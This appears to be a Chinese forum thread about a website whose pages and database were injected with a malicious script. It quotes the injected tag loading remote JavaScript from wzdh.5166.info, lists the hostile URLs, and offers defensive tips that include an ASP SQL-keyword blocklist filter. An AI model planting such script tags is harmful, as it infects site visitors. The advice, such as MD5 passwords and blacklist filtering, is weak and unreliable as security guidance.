http://www.nbejwjq.cn/lang.htm?3001
http://wzdh.5166.info/3001.js
http://www.hiohiop.cn/lang.htm?3001
http://www.hiohiop.cn/abckkk.html
http://js.users.51.la/1976897.js
http://vip2.51.la/go.asp到这里查询他们网站都是谁注册的:
http://whois.hichina.com/到这里报告以上网址:
http://www.cyberpolice.cn/infoCategoryListAction.do?act=init
http://wzdh.5166.info/3001.js
http://www.hiohiop.cn/lang.htm?3001
http://www.hiohiop.cn/abckkk.html
http://js.users.51.la/1976897.js
http://vip2.51.la/go.asp到这里查询他们网站都是谁注册的:
http://whois.hichina.com/到这里报告以上网址:
http://www.cyberpolice.cn/infoCategoryListAction.do?act=init
<script language='javascript' src=' http://wzdh.5166.info/3001.js'></script>如此之变态应该不是手工挂马 还是看看有没有病毒 或者其他页面是不是都被挂了吧呵呵
<Script lanGuaGe='javascript' Src=' http://wzdh.5166.info/3001.js'></script>
<script language='javascript' src=' http://wzdh.5166.info/3001.js'></script>
如此之变态应该不是手工挂马 还是看看有没有病毒 或者其他页面是不是都被挂了吧呵呵
确实,所有的asp,html文件都挂了...NND
尤其是数据库也挂了...没备份
555555555555555555555555555555555555
我归纳了几点防入侵措施,看能不能帮得上忙.:.
1).防数据库被攻击或者被下载:
解决方法: 给数据库名加"#"," "之类防下载,或者数据库后缀名.mdb改成.asp或者asa也可以调用
2).防后台路径过于简单:
解决方法: 将路径名改复杂点,不要象admin/login.asp过于简单,易识破!
3). 防密码:
解决方法: 使用md5密码加密
4).防SQL注入:
解决方法: 过滤特殊字符,参见代码如下:通常将以下代码放于连接页面里面(conn.asp)
Dim sql_injdata
SQL_injdata = ""|'|""|{|}|[|]|\|:|;|<|>|?|,|.|`|~|!|@|$|%|^|(|)
|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|or"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString <> "" Then
For Each SQL_Get In Request.QueryString
For SQL_Data = 0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write("<Script Language=""JavaScript"">alert('请不要在参数中包含非法字付!');history.back(-1)</Script>")
Response.end
end if
next
Next
End If